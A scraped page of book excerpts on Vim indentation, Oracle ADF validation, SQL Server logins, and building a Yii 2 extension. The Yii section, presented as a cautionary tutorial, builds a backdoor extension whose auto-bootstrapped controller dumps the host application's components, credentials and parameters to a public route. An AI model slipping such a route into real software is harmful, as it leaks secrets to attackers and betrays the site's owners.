indentexpr evaluates an expression to compute the indent of a line. Hence, you have to write an expression that Vim can evaluate. You can activate this option by simply setting it to a specific expression such as: :set indentexpr=MyIndenter() Here, MyIndenter() is a function that computes the indentation for the lines it is executed on. A very simple example could be a function that emulates the autoindent option: function! MyIndenter() " Find previous line and get its indentation let prev_lineno = s:prevnonblank(v:lnum) let ind = indent( prev_lineno ) return indendfunction Adding just a bit more functionality than this, the complexity increases quite fast. Vim comes with a lot of different indent expressions for many programming languages. These can serve as inspiration if you want to write your own indent expression. You can find them in the indent folder in your VIMHOME. You can read more about how to use indentexpr in :help 'indentexpr' and :help 'indent-expression'. Fast code-block formatting After you have configured your code formatting, you might want to update your code to follow these settings. To do so, you simply have to tell Vim that it should reindent every single line in the file from the first line to the last. This can be done with the following Vim command: 1G=G If we split it up, it simply says: 1G: Go to the first line of the file (alternatively you can use gg) =: Equalize lines; in other words, indent according to formatting configuration G: Go to the last line in the file (tells Vim where to end indenting) You could easily map this command to a key in order to make it easily accessible: :nmap <F11> 1G=G:imap <F11> <ESC>1G=Ga The last a is to get back into the insert mode as this was where we originally were. So, now you can just press the F11key in order to reindent the entire buffer correctly. Note that if you have a programmatic error, for example, missing a semicolon at the end of a line in a C program, the file will not be correctly indented from that point on in the buffer. This can sometimes be useful to identify where a scope is not closed correctly (for example, a { not closed with a } ). Sometimes, you might just want to format smaller blocks of code. In those cases, you typically have two options—use the natural scope blocks in the code, or select a block of code in the visual mode and indent it. The last one is simple. Go into the visual mode with, for example,Shift+v and then press = to reindent the lines. When it comes to using code blocks on the other hand, there are several different ways to do it. In Vim, there are multiple ways to select a block of code. So in order to combine a command that indents a code block, we need to look at the different types and the commands to select them: i{ Inner block, which means everything between { and } excluding the brackets. This can also be selected with i} and iB. a{ A block, which means all the code between { and } including the brackets. This can also be selected with a} and aB. i( Inner parenthesis, meaning everything between ( and ) excluding the parentheses. Can also be selected with i) and ib. a( A parentheses, meaning everything between ( and ) including the parenthesis. Can also be selected with a) and ab. i< Inner < > block, meaning everything between < and > excluding the brackets. Can also be selected with i>. a< A < > block, meaning everything between < and > including the brackets. Can also be selected with a>. i[ Inner [ ] block, meaning everything between [ and ] excluding the square brackets. Can also be selected with i]. a[ A [ ] block, meaning everything between [ and ], including the square brackets. This can also be selected with a]. So, we have defined what Vim sees a block of code as; now, we simply have to tell it what to do with the block. In our case, we want to reindent the code. We already know that = can do this. So, an example of a code block reindentation could look like this: =i{ Let's execute the code block reindentation in the following code (| being the place where the cursor is): if( a == b ) { print |"a equals b"; } This would produce the following code (with default C format settings): if( a == b ) { print |"a equals b"; } If, on the other hand, we choose to use a { as the block we are working on, then the resulting code would look like this: if( a == b ) { print "a equals b"; } As you can see in the last piece of code, the =a{ command corrects the indentation of both the brackets and the print line. In some cases where you work in a code block with multiple levels of code blocks, you might want to reindent the current block and maybe the surrounding one. No worries, Vim has a fast way to do this. If, for instance, you want to reindent the current code block and besides that want to reindent the block that surrounds it, you simply have to execute the following command while the cursor is placed in the innermost block: =2i{ This simply tells Vim that you will equalize / reindent two levels of inner blocks counting from the "active" block and out. You can replace the number 2 with any number of levels of code blocks you want to reindent. Of course, you can also swap the inner block command with any of the other block commands, and that way select exactly what you want to reindent. So, this is really all it takes to get your code to indent according to the setup you have. Auto format pasted code The trend among programmers tells us that we tend to reuse parts of our code, or so-called patterns. This could mean that you have to do a lot of copying and pasting of code. Most users of Vim have experienced what is often referred to as the stair effect when pasting code into a file. This effect occurs when Vim tries to indent the code as it inserts it. This often results in each new line to be indented to another level, and you ending up with a stair: code line 1 code line 2 codeline 3 code line 4 ... The normal workaround for this is to go into the paste-mode in Vim, which is done by using: :set paste After pasting your code, you can now go back to your normal insert mode again: :set nopaste But what if there was another workaround? What if Vim could automatically indent the pasted code such that it is indented according to the rest of the code in the file? Vim can do that for you with a simple paste command. p=`] This command simply combines the normal paste command (p) with a command that indents the previously inserted lines (=`]). It actually relies on the fact that when you paste with p (lowercase), the cursor stays on the first character of the pasted text. This is combined with `], which takes you to the last character of the latest inserted text and gives you a motion across the pasted text from the first line to the last. So, all you have to do now is map this command to a key and then use this key whenever you paste a piece of code into your file. Using external formatting tools Even though experienced Vim users often say that Vim can do everything, this is of course not the truth—but is close. For those things that Vim can't do, it is smart enough to be able to use external tools. In the following sections, we will take a look at some of the most used external tools that can be used for formatting your code, and how to use them.
Read more
  • 0
  • 0
  • 7160
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at $15.99/month. Cancel anytime
article-image-validating-and-using-model-data
Packt
07 May 2013
14 min read
Save for later

Validating and Using the Model Data

Packt
07 May 2013
14 min read
(For more resources related to this topic, see here.) Declarative validation It's easy to set up declarative validation for an entity object to validate the data that is passed through the metadata file. Declarative validation is the validation added for an attribute or an entity object to fulfill a particular business validation. It is called declarative validation because we don't write any code to achieve the validation as all the business validations are achieved declaratively. The entity object holds the business rules that are defined to fulfill specific business needs such as a range check for an attribute value or to check if the attribute value provided by the user is a valid value from the list defined. The rules are incorporated to maintain a standard way to validate the data. Knowing the lifecycle of an entity object It is important to know the lifecycle of an entity object before knowing the validation that is applied to an entity object. The following diagram depicts the lifecycle of an entity: When a new row is created using an entity object, the status of the entity is set to NEW. When an entity is initialized with some values, the status is changed from NEW to INITIALIZED. At this time, the entity is marked invalid or dirty; this means that the state of the entity is changed from the value that was previously checked with the database value. The status of an entity is changed to UNMODIFIED, and the entity is marked valid after applying validation rules and committing to the database. When the value of an unmodified entity is changed, the status is changed to MODIFIED and the entity is marked dirty again. The modified entity again goes to an UNMODIFIED state when it is saved to the database. When an entity is removed from the database, the status is changed to DELETED. When the value is committed, the status changes to DEAD. Types of validation Validation rules are applied to an entity to make sure that only valid values are committed to the database and to prevent any invalid data from getting saved to the database. In ADF, we use validation rules for the entity object to make sure the row is valid all the time. There are three types of validation rules that can be set for the entity objects; they are as follows: Entity-level validation Attribute-level validation Transaction-level validation Entity-level validation As we know, an entity represents a row in the database table. Entity-level validation is the business rule that is added to the database row. For example, the validation rule that has to be applied to a row is termed as entity-level validation. There are two unique declarative validators that will be available only for entity-level validation—Collection and UniqueKey. The following diagram explains that entity-level validations are applied on a single row in the EMP table. The validated row is highlighted in bold. Attribute-level validation Attribute-level validations are applied to attributes. Business logic mostly involves specific validations to compare different attribute values or to restrict the attributes to a specific range. These kinds of validations are done in attribute-level validation. Some of the declarative validators available in ADF are Compare, Length, and Range. The Precision and Mandatory attribute validations are added, by default, to the attributes from the column definition in the underlying database table. We can only set the display message for the validation. The following diagram explains that the validation is happening on the attributes in the second row: There can be any number of validations defined on a single attribute or on multiple attributes in an entity. In the diagram, Empno has a validation that is different from the validation defined for Ename. Validation for the Job attribute is different from that for the Sal attribute. Similarly, we can define validations for attributes in the entity object. Transaction-level validation Transaction-level validations are done after all entity-level validations are completed. If you want to add any kind of validation at the end of the process, you can defer the validation to the transaction level to ensure that the validation is performed only once. Built-in declarative validators ADF Business Components includes some built-in validators to support and apply validations for entity objects. The following screenshot explains how a declarative validation will show up in the Overview tab: The Business Rules section for the EmpEO.xml file will list all the validations for the EmpEO entity. In the previous screenshot, we will see that the there are no entity-level validators defined and some of the attribute-level validations are listed in the Attributes folder. Collection validator A Collection validator is available only for entity-level validation. To perform operations such as average, min, max, count, and sum for the collection of rows, we use the collection validator. Collection validators are compared to the GROUP BY operation in an SQL query with a validation. The aggregate functions, such as count, sum, min, and max are added to validate the entity row. The validator is operated against the literal value, expression, query result, and so on. You must have the association accessor to add a collection validation. Time for action – adding a collection validator for the DeptEO file Now, we will add a Collection validator to DeptEO.xml for adding a count validation rule. Imagine a business rule that says that the number of employees added to department number 10 should be more than five. In this case, you will have a count operation for the employees added to department number 10 and show a message if the count is less than 5 for a particular department. We will break this action into the following three parts: Adding a declarative validation: In this case, the number of employees added to the department should be greater than five Specifying the execution rule: In our case, the execution of this validation should be fired only for department number 10 Displaying the error message: We have to show an error message to the user stating that the number of employees added to the department is less than five Adding the validation Following are the steps to add the validation: Go to the Business Rules section of DeptEO.xml. You will find the Business Rules section in the Overview tab. Select Entity Validators and click on the + button. You may right-click on the Entity Validators folder and then select New Validator to add a validator. Select Collection as Rule Type and move on to the Rule Definition tab. In this section, select Count for the Operation field; Accessor is the association accessor that gets added through a composition association relationship. Only the composition association accessor will be listed in the Accessor drop-down menu. Select the accessor for EmpEO listed in the dropdown, with Empno as the value for Attribute. In order to create a composition association accessor, you will have to create an association between DeptEO.xml and EmpEO.xml based on the Deptno attribute with cardinality of 1 to *. The Composition Association option has to be selected to enable a composition relationship between the two entities. The value of the Operator option should be selected as Greater Than. Compare with will be a literal value, which is 5 that can be entered in the Enter Literal Value section below. Specifying the execution rule Following are the steps to specify the execution: Now to set the execution rule, we will move to the Validation Execution tab. In the Conditional Execution section, add Deptno = '10' as the value for Conditional Execution Expression. In the Triggering Attribute section, select the Execute only if one of the Selected Attributes has been changed checkbox. Move the Empno attribute to the Selected Attributes list. This will make sure that the validation is fired only if the Empno attribute is changed: Displaying the error message Following are the steps to display the error message: Go to the Failure Handling section and select the Error option for Validation Failure Severity. In the Failure Message section, enter the following text: Please enter more than 5 Employees You can add the message stored in a resource bundle to Failure Message by clicking on the magnifying glass icon. What just happened? We have added a collection validation for our EmpEO.xml object. Every time a new employee is added to the department, the validation rule fires as we have selected Empno as our triggering attribute. The rule is also validated against the condition that we have provided to check if the department number is 10. If the department number is 10, the count for that department is calculated. When the user is ready to commit the data to the database, the rule is validated to check if the count is greater than 5. If the number of employees added is less than 5, the error message is displayed to the user. When we add a collection validator, the EmpEO.xml file gets updated with appropriate entries. The following entries get added for the aforementioned validation in the EmpEO.xml file: <validation:CollectionValidationBean Name="EmpEO_Rule_0" ResId= "com.empdirectory.model.entity.EmpEO_Rule_0" OnAttribute="Empno" OperandType="LITERAL" Inverse="false" CompareType="GREATERTHAN" CompareValue="5" Operation="count"> <validation:OnCondition> <![CDATA[Deptno = '10']]> </validation:OnCondition> </validation:CollectionValidationBean> <ResourceBundle> <PropertiesBundle PropertiesFile= "com.empdirectory.model.ModelBundle"/> </ResourceBundle> The error message that is added in the Failure Handling section is automatically added to the resource bundle. The Compare validator The Compare validator is used to compare the current attribute value with other values. The attribute value can be compared against the literal value, query result, expression, view object attribute, and so on. The operators supported are equal, not-equal, less-than, greater-than, less-than or equal to, and greater-than or equal to. The Key Exists validator This validator is used to check if the key value exists for an entity object. The key value can be a primary key, foreign key, or an alternate key. The Key Exists validator is used to find the key from the entity cache, and if the key is not found, the value is determined from the database. Because of this reason, the Key Exists validator is considered to give better performance. For example, when an employee is assigned to a department deptNo 50 and you want to make sure that deptNo 50 already exists in the DEPT table. The Length validator This validator is used to check the string length of an attribute value. The comparison is based on the character or byte length. The List validator This validator is used to create a validation for the attribute in a list. The operators included in this validation are In and NotIn. These two operators help the validation rule check if an attribute value is in a list. The Method validator Sometimes, we would like to add our own validation with some extra logic coded in our Java class file. For this purpose, ADF provides a declarative validator to map the validation rule against a method in the entity-implementation class. The implementation class is generated in the Java section of the entity object. We need to create and select a method to handle method validation. The method is named as validateXXX(), and the returned value will be of the Boolean type. The Range validator This validator is used to add a rule to validate a range for the attribute value. The operators included are Between and NotBetween. The range will have a minimum and maximum value that can be entered for the attribute. The Regular Expression validator For example, let us consider that we have a validation rule to check if the e-mail ID provided by the user is in the correct format. For the e-mail validation, we have some common rules such as the following: The e-mail ID should start with a string and end with the @ character The e-mail ID's last character cannot be the dot (.) character Two @ characters are not allowed within an e-mail ID For this purpose, ADF provides a declarative Regular Expression validator. We can use the regex pattern to check the value of the attribute. The e-mail address and the US phone number pattern is provided by default: Email: [A-Z0-9._%+-]+@[A-Z0-,9.-]+.[A-Z]{2,4} Phone Number (US): [0-9]{3}-?[0-9]{3}-?[0-9]{4} You should select the required pattern and then click on the Use Pattern button to use it. Matches and NotMatches are the two operators that are included with this validator. The Script validator If we want to include an expression and validate the business rule, the Script validator is the best choice. ADF supports Groovy expressions to provide Script validation for an attribute. The UniqueKey validator This validator is available for use only for entity-level validation. To check for uniqueness in the record, we would be using this validator. If we have a primary key defined for the entity object, the Uniqueness Check Definition section will list the primary keys defined to check for uniqueness, as shown in the following screenshot: If we have to perform a uniqueness check against any attribute other than the primary key attributes, we will have to create an alternate key for the entity object. Time for action – creating an alternate key for DeptEO Currently, the DeptEO.xml file has Deptno as the primary key. We would add business validation that states that there should not be a way to create a duplicate of the department name that is already available. The following steps show how to create an alternate key: Go to the General section of the DeptEO.xml file and expand the Alternate Keys section. Alternate keys are keys that are not part of the primary key. Click on the little + icon to add a new alternate key. Move the Dname attribute from the Available list to the Selected list and click on the OK button. What just happened? We have created an alternate key against the Dname attribute to prepare for a unique check validation for the department name. When the alternate key is added to an entity object, we will see the AltKey attribute listed in the Alternate Key section of the General tab. In the DeptEO.xml file, you will find the following code that gets added for the alternate key definition: <Key Name="AltKey" AltKey="true"> <DesignTime> <Attr Name="_isUnique" Value="true"/> <Attr Name="_DBObjectName" Value="HR.DEPT"/> </DesignTime> <AttrArray Name="Attributes"> <Item Value= "com.empdirectory.model.entity.DeptEO.Dname"/> </AttrArray> </Key> Have a go hero – compare the attributes For the first time, we have learned about the validations in ADF. So it's time for you to create your own validation for the EmpEO and DeptEO entity objects. Add validations for the following business scenarios: Continue with the creation of the uniqueness check for the department name in the DeptEO.xml file. The salary of the employees should not be greater than 1000. Display the following message if otherwise: Please enter Salary less than 1000. Display the message invalid date if the employee's hire date is after 10-10-2001. The length of the characters entered for Dname of DeptEO.xml should not be greater than 10. The location of a department can only be NEWYORK, CALIFORNIA, or CHICAGO. The department name should always be entered in uppercase. If the user enters a value in lowercase, display a message. The salary of an employee with the MANAGER job role should be between 800 and 1000. Display an error message if the value is not in this range. The employee name should always start with an uppercase letter and should end with any character other than special characters such as :, ;, and _. After creating all the validations, check the code and tags generated in the entity's XML file for each of the aforementioned validations.
Read more
  • 0
  • 0
  • 7154

article-image-sql-server-user-management
Vijin Boricha
10 Apr 2018
8 min read
Save for later

Get SQL Server user management right

Vijin Boricha
10 Apr 2018
8 min read
The question who are you sounds pretty simple, right? Well, possibly not where philosophy is concerned, and neither is it where databases are concerned either. But user management is essential for anyone managing databases. In this tutorial, learn how SQL server user management works - and how to configure it in the right way. SQL Server user management: the authentication process During the setup procedure, you have to select a password which actually uses the SQL Server authentication process. This database engine comes from Windows and it is tightly connected with Active Directory and internal Windows authentication. In this phase of development, SQL Server on Linux only supports SQL authentication. SQL Server has a very secure entry point. This means no access without the correct credentials. Every information system has some way of checking a user's identity, but SQL Server has three different ways of verifying identity, and the ability to select the most appropriate method, based on individual or business needs. When using SQL Server authentication, logins are created on SQL Server. Both the user name and the password are created by using SQL Server and stored in SQL Server. Users connecting through SQL Server authentication must provide their credentials every time that they connect (user name and password are transmitted through the network). Note: When using SQL Server authentication, it is highly recommended to set strong passwords for all SQL Server accounts.  As you'll have noticed, so far you have not had any problems accessing SQL Server resources. The reason for this is very simple. You are working under the sa login. This login has unlimited SQL Server access. In some real-life scenarios, sa is not something to play with. It is good practice to create a login under a different name with the same level of access. Now let's see how to create a new SQL Server login. But, first, we'll check the list of current SQL Server logins. To do this, access the sys.sql_logins system catalog view and three attributes: name, is_policy_checked, and is_expiration_checked. The attribute name is clear; the second one will show the login enforcement password policy; and the third one is for enforcing account expiration. Both attributes have a Boolean type of value: TRUE or FALSE (1 or 0). Type the following command to list all SQL logins: 1> SELECT name, is_policy_checked, is_expiration_checked 2> FROM sys.sql_logins 3> WHERE name = 'sa' 4> GO name is_policy_checked is_expiration_checked -------------- ----------------- --------------------- sa 1 0 (1 rows affected) 2. If you want to see what your password for the sa login looks like, just type this version of the same statement. This is the result of the hash function: 1> SELECT password_hash 2> FROM sys.sql_logins 3> WHERE name = 'sa' 4> GO password_hash ------------------------------------------------------------- 0x0200110F90F4F4057F1DF84B2CCB42861AE469B2D43E27B3541628 B72F72588D36B8E0DDF879B5C0A87FD2CA6ABCB7284CDD0871 B07C58D0884DFAB11831AB896B9EEE8E7896 (1 rows affected) 3. Now let's create the login dba, which will require a strong password and will not expire: 1> USE master 2> GO Changed database context to 'master'. 1> CREATE LOGIN dba 2> WITH PASSWORD ='S0m3c00lPa$$', 3> CHECK_EXPIRATION = OFF, 4> CHECK_POLICY = ON 5> GO 4. Re-check the dba on the login list: 1> SELECT name, is_policy_checked, is_expiration_checked 2> FROM sys.sql_logins 3> WHERE name = 'dba' 4> GO name is_policy_checked is_expiration_checked ----------------- ----------------- --------------------- dba 1 0 (1 rows affected) Notice that dba logins do not have any kind of privilege. Let's check that part. First close your current sqlcmd session by typing exit. Now, connect again but, instead of using sa, you will connect with the dba login. After the connection has been successfully created, try to change the content of the active database to AdventureWorks. This process, based on the login name, should looks like this: # dba@tumbleweed:~> sqlcmd -S suse -U dba Password: 1> USE AdventureWorks 2> GO Msg 916, Level 14, State 1, Server tumbleweed, Line 1 The server principal "dba" is not able to access the database "AdventureWorks" under the current security context As you can see, the authentication process will not grant you anything. Simply, you can enter the building but you can't open any door. You will need to pass the process of authorization first. Authorization process After authenticating a user, SQL Server will then determine whether the user has permission to view and/or update data, view metadata, or perform administrative tasks (server-side level, database-side level, or both). If the user, or a group to which the user is amember, has some type of permission within the instance and/or specific databases, SQL Server will let the user connect. In a nutshell, authorization is the process of checking user access rights to specific securables. In this phase, SQL Server will check the login policy to determine whether there are any access rights to the server and/or database level. Login can have successful authentication, but no access to the securables. This means that authentication is just one step before login can proceed with any action on SQL Server. SQL Server will check the authorization process on every T-SQL statement. In other words, if a user has SELECT permissions on some database, SQL Server will not check once and then forget until the next authentication/authorization process. Every statement will be verified by the policy to determine whether there are any changes. Permissions are the set of rules that govern the level of access that principals have to securables. Permissions in an SQL Server system can be granted, revoked, or denied. Each of the SQL Server securables has associated permissions that can be granted to each Principal. The only way a principal can access a resource in an SQL Server system is if it is granted permission to do so. At this point, it is important to note that authentication and authorization are two different processes, but they work in conjunction with one another. Furthermore, the terms login and user are to be used very carefully, as they are not the same: Login is the authentication part User is the authorization part Prior to accessing any database on SQL Server, the login needs to be mapped as a user. Each login can have one or many user instances in different databases. For example, one login can have read permission in AdventureWorks and write permission in WideWorldImporters. This type of granular security is a great SQL Server security feature. A login name can be the same or different from a user name in different databases. In the following lines, we will create a database user dba based on login dba. The process will be based on the AdventureWorks database. After that we will try to enter the database and execute a SELECT statement on the Person.Person table: dba@tumbleweed:~> sqlcmd -S suse -U sa Password: 1> USE AdventureWorks 2> GO Changed database context to 'AdventureWorks'. 1> CREATE USER dba 2> FOR LOGIN dba 3> GO 1> exit dba@tumbleweed:~> sqlcmd -S suse -U dba Password: 1> USE AdventureWorks 2> GO Changed database context to 'AdventureWorks'. 1> SELECT * 2> FROM Person.Person 3> GO Msg 229, Level 14, State 5, Server tumbleweed, Line 1 The SELECT permission was denied on the object 'Person', database 'AdventureWorks', schema 'Person' We are making progress. Now we can enter the database, but we still can't execute SELECT or any other SQL statement. The reason is very simple. Our dba user still is not authorized to access any types of resources. Schema separation In Microsoft SQL Server, a schema is a collection of database objects that are owned by a single principal and form a single namespace. All objects within a schema must be uniquely named and a schema itself must be uniquely named in the database catalog. SQL Server (since version 2005) breaks the link between users and schemas. In other words, users do not own objects; schemas own objects, and principals own schemas. Users can now have a default schema assigned using the DEFAULT_SCHEMA option from the CREATE USER and ALTER USER commands. If a default schema is not supplied for a user, then the dbo will be used as the default schema. If a user from a different default schema needs to access objects in another schema, then the user will need to type a full name. For example, Denis needs to query the Contact tables in the Person schema, but he is in Sales. To resolve this, he would type: SELECT * FROM Person.Contact Keep in mind that the default schema is dbo. When database objects are created and not explicitly put in schemas, SQL Server will assign them to the dbo default database schema. Therefore, there is no need to type dbo because it is the default schema. You read a book excerpt from SQL Server on Linux written by Jasmin Azemović.  From this book, you will be able to recognize and utilize the full potential of setting up an efficient SQL Server database solution in the Linux environment. Check out other posts on SQL Server: How SQL Server handles data under the hood How to implement In-Memory OLTP on SQL Server in Linux How to integrate SharePoint with SQL Server Reporting Services
Read more
  • 0
  • 0
  • 7153

article-image-creating-extension-yii-2
Packt
24 Sep 2014
22 min read
Save for later

Creating an Extension in Yii 2

Packt
24 Sep 2014
22 min read
In this article by Mark Safronov, co-author of the book Web Application Development with Yii 2 and PHP, we we'll learn to create our own extension using a simple way of installation. There is a process we have to follow, though some preparation will be needed to wire up your classes to the Yii application. The whole article will be devoted to this process. (For more resources related to this topic, see here.) Extension idea So, how are we going to extend the Yii 2 framework as an example for this article? Let's become vile this time and make a malicious extension, which will provide a sort of phishing backdoor for us. Never do exactly the thing we'll describe in this article! It'll not give you instant access to the attacked website anyway, but a skilled black hat hacker can easily get enough information to achieve total control over your application. The idea is this: our extension will provide a special route (a controller with a single action inside), which will dump the complete application configuration to the web page. Let's say it'll be reachable from the route /app-info/configuration. We cannot, however, just get the contents of the configuration file itself and that too reliably. At the point where we can attach ourselves to the application instance, the original configuration array is inaccessible, and even if it were accessible, we can't be sure about where it came from anyway. So, we'll inspect the runtime status of the application and return the most important pieces of information we can fetch at the stage of the controller action resolution. That's the exact payload we want to introduce. public function actionConfiguration()    {        $app = Yii::$app;        $config = [            'components' => $app->components,            'basePath' => $app->basePath,            'params' => $app->params,            'aliases' => Yii::$aliases        ];        return yiihelpersJson::encode($config);    } The preceding code is the core of the extension and is assumed in the following sections. In fact, if you know the value of the basePath setting of the application, a list of its aliases, settings for the components (among which the DB connection may reside), and all custom parameters that developers set manually, you can map the target application quite reliably. Given that you know all the credentials this way, you have an enormous amount of highly valuable information about the application now. All you need to do now is make the user install this extension. Creating the extension contents Our plan is as follows: We will develop our extension in a folder, which is different from our example CRM application. This extension will be named yii2-malicious, to be consistent with the naming of other Yii 2 extensions. Given the kind of payload we saw earlier, our extension will consist of a single controller and some special wiring code (which we haven't learned about yet) to automatically attach this controller to the application. Finally, to consider this subproject a true Yii 2 extension and not just some random library, we want it to be installable in the same way as other Yii 2 extensions. Preparing the boilerplate code for the extension Let's make a separate directory, initialize the Git repository there, and add the AppInfoController to it. In the bash command line, it can be achieved by the following commands: $ mkdir yii2-malicious && cd $_$ git init$ > AppInfoController.php Inside the AppInfoController.php file, we'll write the usual boilerplate code for the Yii 2 controller as follows: namespace malicious;use yiiwebController;class AppInfoController extends Controller{// Action here} Put the action defined in the preceding code snippet inside this controller and we're done with it. Note the namespace: it is not the same as the folder this controller is in, and this is not according to our usual auto-loading rules. We will explore later in this article that this is not an issue because of how Yii 2 treats the auto-loading of classes from extensions. Now this controller needs to be wired to the application somehow. We already know that the application has a special property called controllerMap, in which we can manually attach controller classes. However, how do we do this automatically, better yet, right at the application startup time? Yii 2 has a special feature called bootstrapping to support exactly this: to attach some activity at the beginning of the application lifetime, though not at the very beginning but before handling the request for sure. This feature is tightly related to the extensions concept in Yii 2, so it's a perfect time to explain it. FEATURE – bootstrapping To explain the bootstrapping concept in short, you can declare some components of the application in the yiibaseApplication::$bootstrap property. They'll be properly instantiated at the start of the application. If any of these components implement the BootstrapInterface interface, its bootstrap() method will be called, so you'll get the application initialization enhancement for free. Let's elaborate on this. The yiibaseApplication::$bootstrap property holds the array of generic values that you tell the framework to initialize beforehand. It's basically an improvement over the preload concept from Yii 1.x. You can specify four kinds of values to initialize as follows: The ID of an application component The ID of some module A class name A configuration array If it's the ID of a component, this component is fully initialized. If it's the ID of a module, this module is fully initialized. It matters greatly because Yii 2 has lazy loading employed on the components and modules system, and they are usually initialized only when explicitly referenced. Being bootstrapped means to them that their initialization, regardless of whether it's slow or resource-consuming, always happens, and happens always at the start of the application. If you have a component and a module with identical IDs, then the component will be initialized and the module will not be initialized! If the value being mentioned in the bootstrap property is a class name or configuration array, then the instance of the class in question is created using the yiiBaseYii::createObject() facility. The instance created will be thrown away immediately if it doesn't implement the yiibaseBootstrapInterface interface. If it does, its bootstrap() method will be called. Then, the object will be thrown away. So, what's the effect of this bootstrapping feature? We already used this feature while installing the debug extension. We had to bootstrap the debug module using its ID, for it to be able to attach the event handler so that we would get the debug toolbar at the bottom of each page of our web application. This feature is indispensable if you need to be sure that some activity will always take place at the start of the application lifetime. The BootstrapInterface interface is basically the incarnation of a command pattern. By implementing this interface, we gain the ability to attach any activity, not necessarily bound to the component or module, to the application initialization. FEATURE – extension registering The bootstrapping feature is repeated in the handling of the yiibaseApplication::$extensions property. This property is the only place where the concept of extension can be seen in the Yii framework. Extensions in this property are described as a list of arrays, and each of them should have the following fields: name: This field will be with the name of the extension. version: This field will be with the extension's version (nothing will really check it, so it's only for reference). bootstrap: This field will be with the data for this extension's Bootstrap. This field is filled with the same elements as that of Yii::$app->bootstrap described previously and has the same semantics. alias: This field will be with the mapping from Yii 2 path aliases to real directory paths. When the application registers the extension, it does two things in the following order: It registers the aliases from the extension, using the Yii::setAlias() method. It initializes the thing mentioned in the bootstrap of the extension in exactly the same way we described in the previous section. Note that the extensions' bootstraps are processed before the application's bootstraps. Registering aliases is crucial to the whole concept of extension in Yii 2. It's because of the Yii 2 PSR-4 compatible autoloader. Here is the quote from the documentation block for the yiiBaseYii::autoload() method: If the class is namespaced (e.g. yiibaseComponent), it will attempt to include the file associated with the corresponding path alias (e.g. @yii/base/Component.php). This autoloader allows loading classes that follow the PSR-4 standard and have its top-level namespace or sub-namespaces defined as path aliases. The PSR-4 standard is available online at http://www.php-fig.org/psr/psr-4/. Given that behavior, the alias setting of the extension is basically a way to tell the autoloader the name of the top-level namespace of the classes in your extension code base. Let's say you have the following value of the alias setting of your extension: "alias" => ["@companyname/extensionname" => "/some/absolute/path"] If you have the /some/absolute/path/subdirectory/ClassName.php file, and, according to PSR-4 rules, it contains the class whose fully qualified name is companynameextensionnamesubdirectoryClassName, Yii 2 will be able to autoload this class without problems. Making the bootstrap for our extension – hideous attachment of a controller We have a controller already prepared in our extension. Now we want this controller to be automatically attached to the application under attack when the extension is processed. This is achievable using the bootstrapping feature we just learned. Let's create the maliciousBootstrap class for this cause inside the code base of our extension, with the following boilerplate code: <?phpnamespace malicious;use yiibaseBootstrapInterface;class Bootstrap implements BootstrapInterface{/** @param yiiwebApplication $app */public function bootstrap($app){// Controller addition will be here.}} With this preparation, the bootstrap() method will be called at the start of the application, provided we wire everything up correctly. But first, we should consider how we manipulate the application to make use of our controller. This is easy, really, because there's the yiiwebApplication::$controllerMap property (don't forget that it's inherited from yiibaseModule, though). We'll just do the following inside the bootstrap() method: $app->controllerMap['app-info'] = 'maliciousAppInfoController'; We will rely on the composer and Yii 2 autoloaders to actually find maliciousAppInfoController. Just imagine that you can do anything inside the bootstrap. For example, you can open the CURL connection with some botnet and send the accumulated application information there. Never believe random extensions on the Web. This actually concludes what we need to do to complete our extension. All that's left now is to make our extension installable in the same way as other Yii 2 extensions we were using up until now. If you need to attach this malicious extension to your application manually, and you have a folder that holds the code base of the extension at the path /some/filesystem/path, then all you need to do is to write the following code inside the application configuration:  'extensions' => array_merge((require __DIR__ . '/../vendor/yiisoft/extensions.php'),['maliciousapp-info' => ['name' => 'Application Information Dumper','version' => '1.0.0','bootstrap' => 'maliciousBootstrap','alias' => ['@malicious' =>'/some/filesystem/path']// that's the path to extension]]) Please note the exact way of specifying the extensions setting. We're merging the contents of the extensions.php file supplied by the Yii 2 distribution from composer and our own manual definition of the extension. This extensions.php file is what allows Yiisoft to distribute the extensions in such a way that you are able to install them by a simple, single invocation of a require composer command. Let's learn now what we need to do to repeat this feature. Making the extension installable as... erm, extension First, to make it clear, we are talking here only about the situation when Yii 2 is installed by composer, and we want our extension to be installable through the composer as well. This gives us the baseline under all of our assumptions. Let's see the extensions that we need to install: Gii the code generator The Twitter Bootstrap extension The Debug extension The SwiftMailer extension We can install all of these extensions using composer. We introduce the extensions.php file reference when we install the Gii extension. Have a look at the following code: 'extensions' => (require __DIR__ . '/../vendor/yiisoft/extensions.php') If we open the vendor/yiisoft/extensions.php file (given that all extensions from the preceding list were installed) and look at its contents, we'll see the following code (note that in your installation, it can be different): <?php $vendorDir = dirname(__DIR__); return array ( 'yiisoft/yii2-bootstrap' => array ( 'name' => 'yiisoft/yii2-bootstrap', 'version' => '9999999-dev', 'alias' => array ( '@yii/bootstrap' => $vendorDir . '/yiisoft/yii2-bootstrap', ), ), 'yiisoft/yii2-swiftmailer' => array ( 'name' => 'yiisoft/yii2-swiftmailer', 'version' => '9999999-dev', 'alias' => array ( '@yii/swiftmailer' => $vendorDir . ' /yiisoft/yii2-swiftmailer', ), ), 'yiisoft/yii2-debug' => array ( 'name' => 'yiisoft/yii2-debug', 'version' => '9999999-dev', 'alias' => array ( '@yii/debug' => $vendorDir . '/yiisoft/yii2-debug', ), ), 'yiisoft/yii2-gii' => array ( 'name' => 'yiisoft/yii2-gii', 'version' => '9999999-dev', 'alias' => array ( '@yii/gii' => $vendorDir . '/yiisoft/yii2-gii', ), ), ); One extension was highlighted to stand out from the others. So, what does all this mean to us? First, it means that Yii 2 somehow generates the required configuration snippet automatically when you install the extension's composer package Second, it means that each extension provided by the Yii 2 framework distribution will ultimately be registered in the extensions setting of the application Third, all the classes in the extensions are made available in the main application code base by the carefully crafted alias settings inside the extension configuration Fourth, ultimately, easy installation of Yii 2 extensions is made possible by some integration between the Yii framework and the composer distribution system The magic is hidden inside the composer.json manifest of the extensions built into Yii 2. The details about the structure of this manifest are written in the documentation of composer, which is available at https://getcomposer.org/doc/04-schema.md. We'll need only one field, though, and that is type. Yii 2 employs a special type of composer package, named yii2-extension. If you check the manifests of yii2-debug, yii2-swiftmail and other extensions, you'll see that they all have the following line inside: "type": "yii2-extension", Normally composer will not understand that this type of package is to be installed. But the main yii2 package, containing the framework itself, depends on the special auxiliary yii2-composer package: "require": {… other requirements ..."yiisoft/yii2-composer": "*", This package provides Composer Custom Installer (read 